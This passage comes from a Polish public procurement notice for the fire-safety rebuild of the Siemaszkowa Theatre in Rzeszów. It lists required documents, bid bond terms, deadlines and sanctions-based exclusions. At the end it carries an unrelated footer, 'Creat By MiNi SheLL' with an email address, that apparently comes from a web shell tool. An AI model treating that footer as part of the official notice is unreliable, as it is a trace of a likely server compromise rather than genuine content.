udziału<br/>w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby– załącznik nr 6 do SWZ<br/>Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnie z załącznikiem nr 8 do SWZ<br/>Odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed<br/>jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp Wykonawca składa w formie dokumentu, którego wzór zawiera<br/>Załącznik Nr 3 do SWZ.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z Ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – załącznik nr 6A do SWZ. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do wniosku o oferty oświadczenie, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. – załącznik nr 7 do SWZ.<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne<br/>odpowiednie dokumenty- załącznik nr 9 do SWZ.<br/>Wykaz osób skierowanych do realizacji zamówienia, wraz z podaniem danych dotyczących wykształcenia i poziomu doświadczenia<br/>– załącznik nr 9A do SWZ<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych<br/>lub zdolność kredytową wykonawcy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Brak <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertą należy złożyć zgodnie z załącznikiem nr 2 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert, wadium<br/>w wysokości 8 000,00 złotych. Wadium musi obejmować cały okres związania ofertą.<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. W przypadku wnoszenia wadium w pieniądzu wykonawca powinien dokonać przelewu<br/>na rachunek bankowy Zamawiającego: Bank PEKAO S.A. O/Rzeszów 95 1240 4751 1111 0000<br/>5512 0203 z dopiskiem: „Wadium do postępowania Przebudowa budynku Teatru<br/>im. W. Siemaszkowej w Rzeszowie na potrzeby dostosowania do przepisów ppoż. Etap 1”,<br/>przy czym przed upływem terminu do składania ofert środki muszą znaleźć się na rachunku<br/>bankowym Zamawiającego.<br/>Zaleca się dołączenie do oferty kserokopii odcinka polecenia dokonania przelewu.<br/>4. W przypadku składania przez wykonawcę wadium w formie gwarancji bankowej lub<br/>ubezpieczeniowej, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem,<br/>podlegać prawu polskiemu i winna zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta<br/>(banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br/>nr referencyjny nadany sprawie przez Zamawiającego, nazwę zamówienia;<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją;<br/>3) kwotę gwarancji;<br/>4) termin ważności gwarancji;<br/>5) bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji<br/>na pierwsze pisemne żądanie Zamawiającego (nie później niż w ciągu 30 dni od daty<br/>zgłoszenia żądania), w przypadku zaistnienia okoliczności wymienionych w art. 98 ust. 6<br/>ustawy Pzp;<br/>6) nie może zawierać postanowienia, iż zwrot oryginału gwarancji będzie skutkował<br/>wygaśnięciem gwarancji.<br/>5. Zaleca się również, aby gwarancja zawierała adres poczty elektronicznej gwaranta, na który<br/>Zamawiający będzie mógł przesłać oświadczenie o zwolnieniu wadium. Brak adresu poczty<br/>elektronicznej, o którym mowa w zdaniu poprzednim, w treści gwarancji nie będzie stanowił<br/>podstawy do uznania wadium za wniesione w sposób nieprawidłowy.<br/>6. Wymagane jest załączenie do oferty oryginalnego (wystawionego przez gwaranta) dokumentu<br/>gwarancji/poręczenia w formie elektronicznej za pośrednictwem platformy zakupowej<br/>Zamawiającego, podpisanego kwalifikowanym podpisem elektronicznym przez gwaranta,<br/>tj. wystawcę gwarancji/poręczenia.<br/>7. Zamawiający zwraca wadium w okolicznościach i w sposób wskazany w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania podmiotu zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w SWZ,<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do wniosku o oferty oświadczenie, z którego<br/>wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. – załącznik nr 7 do SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umownymi stanowiącymi załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/teatrrzeszow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie<br/>zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com